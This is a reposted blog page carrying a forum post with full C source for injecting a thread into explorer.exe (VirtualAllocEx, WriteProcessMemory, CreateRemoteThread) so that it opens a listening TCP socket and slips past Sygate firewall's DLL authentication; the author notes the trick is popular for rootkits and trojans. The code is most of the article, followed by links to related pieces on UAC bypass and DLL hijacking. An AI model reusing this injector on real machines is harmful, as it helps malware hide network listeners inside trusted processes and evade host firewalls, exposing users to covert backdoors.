bypass dll authentication in sygate and such

最新推荐文章于 2024-11-02 23:22:46 发布
转载 最新推荐文章于 2024-11-02 23:22:46 发布 · 1k 阅读 · 0
文章标签:

#authentication #dll #socket #winapi #null #struct

本文介绍了一种绕过Sygate软件DLL认证的方法。通过在远程应用中分配并执行线程,设置监听套接字来实现DLL认证的绕过。这种方法可用于理解Sygate的工作原理。
  akcom

sygate uses a very 'spiff' method that limits injecting a dll into a process, a popular method for rootkits and trojans alike. this is just some example code to bypass sygate dll authentication, its very simple, but its just to get the concept across. It functions by allocating a function in a remote application (in this example, explorer.exe) and then executes the thread. the thread then sets up a listening socket, all of which should get bypass sygate's dll authenication.

I'm not a big fan of commenting, so if you have any questions, just provide me with the line and i will explain it

#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include

typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );
typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );
typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );
typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );
typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );
typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );
typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );
typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );
typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );


typedef struct _INJINFO
{
char c_Lib[16];
char c_WSAStartup[12];
char c_Socket[8];
char c_Bind[8];
char c_Listen[8];
char c_Accept[8];
char c_CloseSocket[16];
char c_send[8];
char c_data[45];
LPLoadLibrary LoadLib;
LPGetProcAddress GetProcAddr;
} INJINFO, *PINJINFO;

static DWORD WINAPI ThreadProc( LPVOID lpParams )
{
PINJINFO info = (PINJINFO)lpParams;

HMODULE hLib = info->LoadLib( info->c_Lib );

LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );
LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );
LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );
LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );
LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );
LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );
LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );

SOCKADDR_IN sAddr;
sAddr.sin_addr.s_addr = INADDR_ANY;
sAddr.sin_port = 0xDEAD;
sAddr.sin_family = AF_INET;

WSADATA wsa;
wsastartup( 0x0202, &wsa );

SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) );
wsalisten( ServerSocket, 5 );

SOCKET cli;
while (true)
{
cli = wsaaccept( ServerSocket, NULL, NULL );
if ( cli == SOCKET_ERROR )
break;
wsasend( cli, info->c_data, 45, 0 );
}

wsaclosesocket( ServerSocket );
return 0;
}

static void __declspec( naked ) end_proc()
{

}

INJINFO info =
{
"ws2_32.dll",
"WSAStartup",
"socket",
"bind",
"listen",
"accept",
"closesocket",
"send",
"slutted",
NULL,
NULL
};

int main(int argc, char* argv[])
{
HMODULE hLib = LoadLibrary( "kernel32.dll" );

info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, "LoadLibraryA" );
info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, "GetProcAddress" );
DWORD dwPID;

GetWindowThreadProcessId( FindWindow( "Shell_TrayWnd", NULL ), &dwPID );

printf( "explorer pid: 0x%x/n", dwPID );

HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
if ( hProcess == NULL )
{
printf( "error opening process/n" );
return 0;
}

DWORD ProcSize = (DWORD)end_proc - (DWORD)ThreadProc;
printf( "proc size: %u/n", ProcSize );
LPVOID lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
LPVOID lpParams = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_READWRITE );

if ( !lpProc || !lpParams )
{
printf( "error allocating mem/n" );
return 0;
}
printf( "memory allocated at 0x%X and 0x%X/n", lpProc, lpParams );

DWORD dwWritten;
WriteProcessMemory( hProcess, lpProc, ThreadProc, ProcSize, &dwWritten );
WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten );

printf( "memory written/n" );
DWORD ThreadID;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );

if ( hThread == NULL )
{
printf( "error creating thread/n" );
}
else
{
WaitForSingleObject( hThread, INFINITE );
}

VirtualFreeEx( hProcess, lpProc, ProcSize, MEM_DECOMMIT );
VirtualFreeEx( hProcess, lpParams, 1024, MEM_DECOMMIT );

printf( "done/n" );
return 0;
}

Windows Sockets下网络编程的函数与套路详解
QQ845264718
04-12 675
套接字(socket) AF_INET 网际域—windows sockets只支持一个通信区域(地址族)。 套接字类型: 流式套接字(SOCK_STREAM) 提供面向连接、可靠的数据传输服务,数据无差错、无重复的发送,且按发送顺序接收。实际基于TCP实现。 数据报式套接字(SOCK_DGARM) 提供无连接服务。数据包以独立包形式发送,不提供无差错保证,数据可能会丢失或重复,并且接收顺序混乱,实践基于UDP实现。 原始套接字(SOCK_RAW) 主机字节序与网络字节序 主机字节序: 主机字节序是混乱
Lab: Authentication bypass via encryption oracle 漏洞平台
gyh3534的博客
07-02 1645
https://portswigger.net/业务web-security/logic-flaws 学习地址在线计算字符串长度-开发者工具网 线上字符串长度计算;在线时间戳转换工具 时间戳在线换算Base64笔记 - 阮一峰的网络日志 base64讲解先说问题:1、希望懂加密算法的朋友,帮忙留言,文章中的问题;base64 解码后,hex 处理,留下的字符数应该是一样的,为什么长度却不一样??本题难点是对加密原理的理解,和对base64 解码内容修改; 解题思路:1、登录用户时,使用题解给的账号密码登录,
dll注入工具_bypassUAC && DLL劫持
weixin_39673303的博客
11-29 1224
0x11 UAC简介用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。UAC需要授权的动作包括:1.配置Windows Update2.增加或删除用户账户3.改变用户...
打怪升级之bind()、listen()、connect()函数
Blanchet的博客
02-18 322
bind()、listen()、connect()的函数使用
WinSock网络编程学习笔记(八):测试bind程序
Less Is More
03-01 2263
Winsock网络编程学习笔记。新手可以看看!欢迎交流!
Windows权限提升—BypassUAC、DLL劫持、引号路径、服务权限等提权
2401_84973069的博客
05-13 1264
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Xiaomi-HyperOS-BootLoader-Bypass
08-01
Xiaomi-HyperOS-BootLoader-Bypass相关知识点: Xiaomi-HyperOS-BootLoader-Bypass是专门针对小米设备的BootLoader解锁工具。BootLoader是嵌入在智能手机等设备上的固件,用于初始化硬件并加载操作系统。它通常在...
domino_authentication_bypass.nasl
11-08
domino_authentication_bypass
Jr Penetration Tester--Authentication Bypass
LYL768976的博客
11-02 2131
我们该如何绕过身份验证呢
tomcat Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
03-28
标题 "Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability" 指的是一个与Apache Tomcat服务器相关的安全问题。Apache Tomcat是广泛使用的开源Java Servlet容器,它实现了Java EE(现在称为...
事件选择模型
weixin_34342207的博客
06-12 282
    事件选择(WSAEventSelect)模型是另一个有用的异步 I/O 模型。和 WSAAsyncSelect 模型类似的是,它也允许应用程序在一个或多个套接字上,接收以事件为基 础的网络事件通知,最主要的差别在于网络事件会投递至一个事件对象句柄,而非投递到一个窗口例程。     事件通知模型要求我们的应用程序针对使用的每一个套接字,首先创建一个事件对象。创建方法是调用 WSACrea...
WSASocket写的简单的C/S端
lu1012123053的专栏
11-19 8455
/* * 服务器端 */ #include #include #include #pragma comment(lib,"Ws2_32.lib") SOCKET sockSvc;//服务器端socket SOCKET sockConnect; //连接用的socket DWORD WINAPI Recv
winsock2 bind函数的功能
苹果君的工作室
01-27 1990
int bind(__in SOCKET s,__in const struct sockaddr* name,__in int namelen); bind函数只能用于还没有连接的socket,即只能在connect或者listen之前调用一个socket只能调用一次bind所以socket一旦bind就不能在改变
网络编程(54)—— Windows下使用WSASocket基于事件进行IO重叠
Hyman的博客
01-06 2681
一、引言         本文主要研究下Windows下的IO重叠技术。         何为IO重叠?按照它的定义,在同一个线程中,我们同时向多个目标socket发送数据或者从多个socket接收数据,而我们用于传递和接收的函数未等IO过程结束就返回,而数据的传递和接收工作完全交给了操作系统,在这个过程中针对目标socket的每个IO操作在时间片上都发生了重叠,这就是IO重叠,如下图所示:
Bypass mode and GPIO mode
最新发布
11-04
嗯,用户这次问的是"旁路模式"(Bypass mode)和"GPIO模式"(GPIO mode)的区别。这个问题很有针对性,看来用户正在研究嵌入式系统的GPIO控制器功能。 参考引用[1]提到GPIO控制器支持"旁路模式",但没具体解释。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值